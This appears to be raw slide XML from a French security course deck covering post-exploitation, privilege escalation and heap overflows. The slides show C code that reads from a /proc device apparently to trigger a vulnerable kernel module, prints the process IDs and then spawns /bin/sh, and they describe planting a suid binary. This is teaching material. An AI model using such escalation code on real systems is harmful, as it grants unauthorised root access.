              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</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r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</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r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/proc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mydev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</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O_RDONLY</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> size </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r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read</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fd</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buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> %d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d,gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d,euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d,egid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=%d\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>geteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getegid</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effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/bin/sh"</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF21EBE-EFAC-5FD3-0C74-1A2F2DC32F7E}"/>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1" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB06FC8-0064-5C65-4B7C-62625A0C08F5}"/>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Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316301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7346EA-DABB-0788-4EE3-0F4C54351BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02AB627C-F765-7114-BD53-FD6D39246A1A}"/>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8D550CF9-F5F6-E5F3-C247-10049A99ADC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02FA7534-B168-D301-6F1B-18FD648B83B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395672" y="2044490"/>
            <a:ext cx="4527417" cy="1620927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC5D373-5FA4-44A7-903E-0F26539F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85" y="1452234"/>
            <a:ext cx="3548384" cy="2805441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45084D0A-2222-9C99-4162-1A1561324E4B}"/>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Elévation de privilèges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED887D4A-8754-7383-B6BF-B4423F862B14}"/>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Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B439C0C7-B2D4-8875-450D-016865F88C85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1152622"/>
            <a:ext cx="8509659" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On dépose un binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> sur le système</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3249581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5FB46AB-697F-0001-F108-83A582D13C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9331679C-21D8-603D-4D97-8A8ABBA370E7}"/>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BF546F1E-0D0D-AAC4-D6C4-BCD7B6B03310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>QUID du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
